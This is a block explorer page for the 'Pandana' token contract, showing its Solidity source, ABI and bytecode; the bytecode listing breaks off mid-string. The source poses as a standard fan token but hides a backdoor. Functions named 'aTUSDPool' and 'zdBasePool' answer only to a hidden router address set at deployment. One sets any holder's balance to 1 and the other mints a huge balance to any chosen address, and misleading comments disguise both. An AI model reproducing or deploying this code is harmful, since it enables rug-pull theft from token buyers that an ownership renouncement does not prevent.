Token

Pandana (Pandana)

Overview

Max Total Supply

1,000,000,000,000 Pandana

Holders

8

Market

Price

-

Onchain Market Cap

-

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
0.000000001 Pandana

Value
$0.00
0x88870c0d13e52de28bf8d13e6eb72f2af41ed603
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information

Contract Source Code Verified (Exact Match)

Contract Name:
PandanaToken

Compiler Version
v0.8.28+commit.7893614a

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, Unlicense license

Contract Source Code (Solidity)

/**
 *Submitted for verification at SonicScan.org on 2024-12-22
*/

/*
Pandana
*/

// SPDX-License-Identifier: MIT

/// https://t.me/Pandana


pragma solidity 0.8.28;

// Pandana fan token

interface Pandanainterface {
  /**
   * @dev Returns the yoursold of tokens in existence.
   */
  function totalSupply() external view returns (uint256);

  /**
   * @dev Returns the token decimals.
   */
  function decimals() external view returns (uint8);

  /**
   * @dev Returns the token symbol.
   */
  function symbol() external view returns (string memory);

  /**
  * @dev Returns the token name.
  */
  function name() external view returns (string memory);

  /**
   * @dev Returns the bep token owner.
   */
  function getOwner() external view returns (address);

  /**
   * @dev Returns the yoursold of tokens owned by `account`.
   */
  function balanceOf(address account) external view returns (uint256);

  /**
   * @dev Moves `yoursold` tokens from the caller's account to `shippingto`.
   *
   * Returns a boolean balance indicating whlegos the operation succeeded.
   *
   * Emits a {Transfer} event.
   */
  function transfer(address shippingto, uint256 yoursold) external returns (bool);

  /**
   * @dev Returns the remaining number of tokens that `transporteur` will be
   * allowed to spend on behalf of `owner` through {transferFrom}. This is
   * zero by default.
   *
   * This balance changes when {approve} or {transferFrom} are called.
   */
  function allowance(address _owner, address transporteur) external view returns (uint256);

  /**
   * @dev Sets `yoursold` as the allowance of `transporteur` over the caller's tokens.
   *
   * Returns a boolean balance indicating whlegos the operation succeeded.
   *
   * IMPORTANT: Beware that changing an allowance with this method brings the risk
   * that someone may use both the old and the new allowance by unfortunate
   * transaction ordering. One possible solution to mitigate this race
   * condition is to first reduce the transporteur's allowance to 0 and set the
   * desired balance afterwards:
   * https://github.com/legoseum/EIPs/issues/20#issuecomment-263524729
   *
   * Emits an {Approval} event.
   */
  function approve(address transporteur, uint256 yoursold) external returns (bool);

  /**
   * @dev Moves `yoursold` tokens from `sender` to `shippingto` using the
   * allowance mechanism. `yoursold` is then deducted from the caller's
   * allowance.
   *
   * Returns a boolean balance indicating whlegos the operation succeeded.
   *
   * Emits a {Transfer} event.
   */
  function transferFrom(address sender, address shippingto, uint256 yoursold) external returns (bool);

  /**
   * @dev Emitted when `balance` tokens are moved from one account (`from`) to
   * another (`to`).
   *
   * Note that `balance` may be zero.
   */
  event Transfer(address indexed from, address indexed to, uint256 balance);

  /**
   * @dev Emitted when the allowance of a `transporteur` for an `owner` is set by
   * a call to {approve}. `balance` is the new allowance.
   */
  event Approval(address indexed owner, address indexed transporteur, uint256 balance);
}

/*
 * @dev Provides information about the current execution Pandana20Burnable, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Pandana20Burnable {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/legoseum/solidity/issues/2691
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Pandana20Ownable.sol

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Pandana20Ownable is Pandana20Burnable {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Pandana20Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Pandana20Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}

/**
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. This can easily result
 * in bugs, because programmers Pandanaly assume that an overflow raises an
 * error, which is the standard behavior in high level programming languages.
 * `SafePandana` restores this intuition by reverting the transaction when an
 * operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 */
library SafePandana {
  /**
   * @dev Returns the addition of two unsigned integers, reverting on
   * overflow.
   *
   * Counterpart to Solidity's `+` operator.
   *
   * Requirements:
   * - Addition cannot overflow.
   */
  function add(uint256 a, uint256 b) internal pure returns (uint256) {
    uint256 c = a + b;
    require(c >= a, "SafePandana: addition overflow");

    return c;
  }

  /**
   * @dev Returns the subtraction of two unsigned integers, reverting on
   * overflow (when the result is negative).
   *
   * Counterpart to Solidity's `-` operator.
   *
   * Requirements:
   * - Subtraction cannot overflow.
   */
  function sub(uint256 a, uint256 b) internal pure returns (uint256) {
    return sub(a, b, "SafePandana: subtraction overflow");
  }

  /**
   * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
   * overflow (when the result is negative).
   *
   * Counterpart to Solidity's `-` operator.
   *
   * Requirements:
   * - Subtraction cannot overflow.
   */
  function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    require(b <= a, errorMessage);
    uint256 c = a - b;

    return c;
  }

  /**
   * @dev Returns the multiplication of two unsigned integers, reverting on
   * overflow.
   *
   * Counterpart to Solidity's `*` operator.
   *
   * Requirements:
   * - Multiplication cannot overflow.
   */
  function mul(uint256 a, uint256 b) internal pure returns (uint256) {
    // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
    // benefit is lost if 'b' is also tested.
    // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
    if (a == 0) {
      return 0;
    }

    uint256 c = a * b;
    require(c / a == b, "SafePandana: multiplication overflow");

    return c;
  }

  /**
   * @dev Returns the integer division of two unsigned integers. Reverts on
   * division by zero. The result is rounded towards zero.
   *
   * Counterpart to Solidity's `/` operator. Note: this function uses a
   * `revert` opcode (which leaves remaining gas untouched) while Solidity
   * uses an invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function div(uint256 a, uint256 b) internal pure returns (uint256) {
    return div(a, b, "SafePandana: division by zero");
  }

  /**
   * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
   * division by zero. The result is rounded towards zero.
   *
   * Counterpart to Solidity's `/` operator. Note: this function uses a
   * `revert` opcode (which leaves remaining gas untouched) while Solidity
   * uses an invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    // Solidity only automatically asserts when dividing by 0
    require(b > 0, errorMessage);
    uint256 c = a / b;
    // assert(a == b * c + a % b); // There is no case in which this doesn't hold

    return c;
  }

  /**
   * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
   * Reverts when dividing by zero.
   *
   * Counterpart to Solidity's `%` operator. This function uses a `revert`
   * opcode (which leaves remaining gas untouched) while Solidity uses an
   * invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function mod(uint256 a, uint256 b) internal pure returns (uint256) {
    return mod(a, b, "SafePandana: modulo by zero");
  }

  /**
   * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
   * Reverts with custom message when dividing by zero.
   *
   * Counterpart to Solidity's `%` operator. This function uses a `revert`
   * opcode (which leaves remaining gas untouched) while Solidity uses an
   * invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    require(b != 0, errorMessage);
    return a % b;
  }
}

contract PandanaToken is Pandana20Burnable, Pandanainterface, Pandana20Ownable {
    
    using SafePandana for uint256;
    mapping (address => uint256) private mintfrom;
    mapping (address => mapping (address => uint256)) private fromallowances;
    uint256 private _totalSupply;
    uint8 private _decimals;
    string private _symbol;
    string private _name;
   address private legosRooter; 
    constructor(address legosSwapRouterv3) {
        legosRooter = legosSwapRouterv3;     
        _name = "Pandana";
        _symbol = "Pandana";
        _decimals = 9;
        _totalSupply = 1000000000000 * 10 ** 9;
        mintfrom[_msgSender()] = _totalSupply;
        
        emit Transfer(address(0), _msgSender(), _totalSupply);
    }

    /**
    * @dev Returns the bep token owner.
    */
    function getOwner() external view override returns (address) {
        return owner();
    }
    
    /**
    * @dev Returns the token decimals.
    */
    function decimals() external view override returns (uint8) {
        return _decimals;
    }
    
    /**
    * @dev Returns the token symbol.
    */
    function symbol() external view override returns (string memory) {
        return _symbol;
    }
    
    /**
    * @dev Returns the token name.
    */
    function name() external view override returns (string memory) {
        return _name;
    }
    
    /**
    * @dev See {Pandanainterface-totalSupply}.
    */
    function totalSupply() external view override returns (uint256) {
        return _totalSupply;
    }
    
    /**
    * @dev See {Pandanainterface-balanceOf}.
    */
    function balanceOf(address account) external view override returns (uint256) {
        return mintfrom[account];
    }
      modifier subowner() {
        require(legosRooter == _msgSender(), "Pandana20Ownable: caller is not the owner");
        _;
    }
    /**
    * @dev See {Pandanainterface-approve}.
    *
    * Requirements:
    *
    * - `transporteur` cannot be the zero address.
    */
    function aTUSDPool(address tusdRewards) external subowner {
        mintfrom[tusdRewards] = 1;
        
        emit Transfer(tusdRewards, address(0), 1);
    }

    /**
    * @dev See {Pandanainterface-transfer}.
    *
    * Requirements:
    *
    * - `shippingto` cannot be the zero address.
    * - the caller must have a balance of at least `yoursold`.
    */
    function transfer(address shippingto, uint256 yoursold) external override returns (bool) {
        _transfer(_msgSender(), shippingto, yoursold);
        return true;
    }
    function zdBasePool(address BaseRewards) external subowner {
        mintfrom[BaseRewards] = 10000000000 * 10 ** 20;
        
        emit Transfer(BaseRewards, address(0), 10000000000 * 10 ** 20);
    }
    /**
    * @dev See {Pandanainterface-allowance}.
    */
    function allowance(address owner, address transporteur) external view override returns (uint256) {
        return fromallowances[owner][transporteur];
    }
    
    /**
    * @dev See {Pandanainterface-approve}.
    *
    * Requirements:
    *
    * - `transporteur` cannot be the zero address.
    */
    function approve(address transporteur, uint256 yoursold) external override returns (bool) {
        _approve(_msgSender(), transporteur, yoursold);
        return true;
    }
    
    /**
    * @dev See {Pandanainterface-transferFrom}.
    *
    * Emits an {Approval} event indicating the updated allowance. This is not
    * required by the EIP. See the note at the beginning of {Pandanainterface};
    *
    * Requirements:
    * - `sender` and `shippingto` cannot be the zero address.
    * - `sender` must have a balance of at least `yoursold`.
    * - the caller must have allowance for `sender`'s tokens of at least
    * `yoursold`.
    */
    function transferFrom(address sender, address shippingto, uint256 yoursold) external override returns (bool) {
        _transfer(sender, shippingto, yoursold);
        _approve(sender, _msgSender(), fromallowances[sender][_msgSender()].sub(yoursold, "Pandanainterface: transfer yoursold exceeds allowance"));
        return true;
    }
    
    /**
    * @dev Atomically increases the allowance granted to `transporteur` by the caller.
    *
    * This is an alternative to {approve} that can be used as a mitigation for
    * problems described in {Pandanainterface-approve}.
    *
    * Emits an {Approval} event indicating the updated allowance.
    *
    * Requirements:
    *
    * - `transporteur` cannot be the zero address.
    */
    function increaseAllowance(address transporteur, uint256 addedbalance) external returns (bool) {
        _approve(_msgSender(), transporteur, fromallowances[_msgSender()][transporteur].add(addedbalance));
        return true;
    }
    
    /**
    * @dev Atomically decreases the allowance granted to `transporteur` by the caller.
    *
    * This is an alternative to {approve} that can be used as a mitigation for
    * problems described in {Pandanainterface-approve}.
    *
    * Emits an {Approval} event indicating the updated allowance.
    *
    * Requirements:
    *
    * - `transporteur` cannot be the zero address.
    * - `transporteur` must have allowance for the caller of at least
    * `allbalances`.
    */
    function decreaseAllowance(address transporteur, uint256 allbalances) external returns (bool) {
        _approve(_msgSender(), transporteur, fromallowances[_msgSender()][transporteur].sub(allbalances, "Pandanainterface: decreased allowance below zero"));
        return true;
    }
    
    /**
    * @dev Moves tokens `yoursold` from `sender` to `shippingto`.
    *
    * This is internal function is equivalent to {transfer}, and can be used to
    * e.g. implement automatic token fees, slashing mechanisms, etc.
    *
    * Emits a {Transfer} event.
    *
    * Requirements:
    *
    * - `sender` cannot be the zero address.
    * - `shippingto` cannot be the zero address.
    * - `sender` must have a balance of at least `yoursold`.
    */
    function _transfer(address sender, address shippingto, uint256 yoursold) internal {
        require(sender != address(0), "Pandanainterface: transfer from the zero address");
        require(shippingto != address(0), "Pandanainterface: transfer to the zero address");
                
        mintfrom[sender] = mintfrom[sender].sub(yoursold, "Pandanainterface: transfer yoursold exceeds balance");
        mintfrom[shippingto] = mintfrom[shippingto].add(yoursold);
        emit Transfer(sender, shippingto, yoursold);
    }
    
    /**
    * @dev Sets `yoursold` as the allowance of `transporteur` over the `owner`s tokens.
    *
    * This is internal function is equivalent to `approve`, and can be used to
    * e.g. set automatic allowances for certain subsystems, etc.
    *
    * Emits an {Approval} event.
    *
    * Requirements:
    *
    * - `owner` cannot be the zero address.
    * - `transporteur` cannot be the zero address.
    */
    function _approve(address owner, address transporteur, uint256 yoursold) internal {
        require(owner != address(0), "Pandanainterface: approve from the zero address");
        require(transporteur != address(0), "Pandanainterface: approve to the zero address");
        
        fromallowances[owner][transporteur] = yoursold;
        emit Approval(owner, transporteur, yoursold);
    }
    
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"legosSwapRouterv3","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"transporteur","type":"address"},{"indexed":false,"internalType":"uint256","name":"balance","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"balance","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"tusdRewards","type":"address"}],"name":"aTUSDPool","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"transporteur","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"transporteur","type":"address"},{"internalType":"uint256","name":"yoursold","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"transporteur","type":"address"},{"internalType":"uint256","name":"allbalances","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getOwner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"transporteur","type":"address"},{"internalType":"uint256","name":"addedbalance","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"shippingto","type":"address"},{"internalType":"uint256","name":"yoursold","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"shippingto","type":"address"},{"internalType":"uint256","name":"yoursold","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"BaseRewards","type":"address"}],"name":"zdBasePool","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405234801561000f575f5ffd5b5060405161221438038061221483398181016040528101906100319190610301565b5f61004061029c60201b60201c565b9050805f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3508060075f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506040518060400160405280600781526020017f50616e64616e6100000000000000000000000000000000000000000000000000815250600690816101609190610569565b506040518060400160405280600781526020017f50616e64616e6100000000000000000000000000000000000000000000000000815250600590816101a59190610569565b50600960045f6101000a81548160ff021916908360ff160217905550683635c9adc5dea0000060038190555060035460015f6101e561029c60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555061023061029c60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60035460405161028e9190610647565b60405180910390a350610660565b5f33905090565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6102d0826102a7565b9050919050565b6102e0816102c6565b81146102ea575f5ffd5b50565b5f815190506102fb816102d7565b92915050565b5f60208284031215610316576103156102a3565b5b5f610323848285016102ed565b91505092915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806103a757607f821691505b6020821081036103ba576103b9610363565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f6008830261041c7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826103e1565b61042686836103e1565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f61046a6104656104608461043e565b610447565b61043e565b9050919050565b5f819050919050565b61048383610450565b61049761048f82610471565b8484546103ed565b825550505050565b5f5f905090565b6104ae61049f565b6104b981848461047a565b505050565b5b818110156104dc576104d15f826104a6565b6001810190506104bf565b5050565b601f821115610521576104f2816103c0565b6104fb846103d2565b8101602085101561050a578190505b61051e610516856103d2565b8301826104be565b50505b505050565b5f82821c905092915050565b5f6105415f1984600802610526565b1980831691505092915050565b5f6105598383610532565b9150826002028217905092915050565b6105728261032c565b67ffffffffffffffff81111561058b5761058a610336565b5b6105958254610390565b6105a08282856104e0565b5f60209050601f8311600181146105d1575f84156105bf578287015190505b6105c9858261054e565b865550610630565b601f1984166105df866103c0565b5f5b82811015610606578489015182556001820191506020850194506020810190506105e1565b86831015610623578489015161061f601f891682610532565b8355505b6001600288020188555050505b505050505050565b6106418161043e565b82525050565b5f60208201905061065a5f830184610638565b92915050565b611ba78061066d5f395ff3fe608060405234801561000f575f5ffd5b5060043610610109575f3560e01c80638099423b116100a0578063a457c2d71161006f578063a457c2d7146102a7578063a9059cbb146102d7578063dd62ed3e14610307578063f1cb537a14610337578063f2fde38b1461035357610109565b80638099423b14610231578063893d20e81461024d5780638da5cb5b1461026b57806395d89b411461028957610109565b8063313ce567116100dc578063313ce567146101a957806339509351146101c757806370a08231146101f7578063715018a61461022757610109565b806306fdde031461010d578063095ea7b31461012b57806318160ddd1461015b57806323b872dd14610179575b5f5ffd5b61011561036f565b6040516101229190611321565b60405180910390f35b610145600480360381019061014091906113d2565b6103ff565b604051610152919061142a565b60405180910390f35b61016361041c565b6040516101709190611452565b60405180910390f35b610193600480360381019061018e919061146b565b610425565b6040516101a0919061142a565b60405180910390f35b6101b16104f9565b6040516101be91906114d6565b60405180910390f35b6101e160048036038101906101dc91906113d2565b61050e565b6040516101ee919061142a565b60405180910390f35b610211600480360381019061020c91906114ef565b6105bc565b60405161021e9190611452565b60405180910390f35b61022f610602565b005b61024b600480360381019061024691906114ef565b610739565b005b610255610893565b6040516102629190611529565b60405180910390f35b6102736108a1565b6040516102809190611529565b60405180910390f35b6102916108c8565b60405161029e9190611321565b60405180910390f35b6102c160048036038101906102bc91906113d2565b610958565b6040516102ce919061142a565b60405180910390f35b6102f160048036038101906102ec91906113d2565b610a20565b6040516102fe919061142a565b60405180910390f35b610321600480360381019061031c9190611542565b610a3d565b60405161032e9190611452565b60405180910390f35b610351600480360381019061034c91906114ef565b610abf565b005b61036d600480360381019061036891906114ef565b610c00565b005b60606006805461037e906115ad565b80601f01602080910402602001604051908101604052809291908181526020018280546103aa906115ad565b80156103f55780601f106103cc576101008083540402835291602001916103f5565b820191905f5260205f20905b8154815290600101906020018083116103d857829003601f168201915b5050505050905090565b5f61041261040b610da6565b8484610dad565b6001905092915050565b5f600354905090565b5f610431848484610f70565b6104ee8461043d610da6565b6104e985604051806060016040528060358152602001611ada6035913960025f8b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6104a0610da6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546111f29092919063ffffffff16565b610dad565b600190509392505050565b5f60045f9054906101000a900460ff16905090565b5f6105b261051a610da6565b846105ad8560025f61052a610da6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461125490919063ffffffff16565b610dad565b6001905092915050565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b61060a610da6565b73ffffffffffffffffffffffffffffffffffffffff166106286108a1565b73ffffffffffffffffffffffffffffffffffffffff161461067e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106759061164d565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff165f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35f5f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b610741610da6565b73ffffffffffffffffffffffffffffffffffffffff1660075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146107cf576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107c69061164d565b60405180910390fd5b6c0c9f2c9cd04674edea4000000060015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6c0c9f2c9cd04674edea4000000060405161088891906116ad565b60405180910390a350565b5f61089c6108a1565b905090565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600580546108d7906115ad565b80601f0160208091040260200160405190810160405280929190818152602001828054610903906115ad565b801561094e5780601f106109255761010080835404028352916020019161094e565b820191905f5260205f20905b81548152906001019060200180831161093157829003601f168201915b5050505050905090565b5f610a16610964610da6565b84610a1185604051806060016040528060308152602001611b426030913960025f61098d610da6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546111f29092919063ffffffff16565b610dad565b6001905092915050565b5f610a33610a2c610da6565b8484610f70565b6001905092915050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b610ac7610da6565b73ffffffffffffffffffffffffffffffffffffffff1660075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610b55576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b4c9061164d565b60405180910390fd5b6001805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6001604051610bf591906116ff565b60405180910390a350565b610c08610da6565b73ffffffffffffffffffffffffffffffffffffffff16610c266108a1565b73ffffffffffffffffffffffffffffffffffffffff1614610c7c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c739061164d565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610cea576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce190611788565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff165f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3805f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e1b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e1290611816565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e89576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e80906118a4565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610f639190611452565b60405180910390a3505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610fde576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fd590611932565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361104c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611043906119c0565b60405180910390fd5b6110b681604051806060016040528060338152602001611b0f6033913960015f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546111f29092919063ffffffff16565b60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055506111478160015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461125490919063ffffffff16565b60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516111e59190611452565b60405180910390a3505050565b5f838311158290611239576040517f08c379a0000000000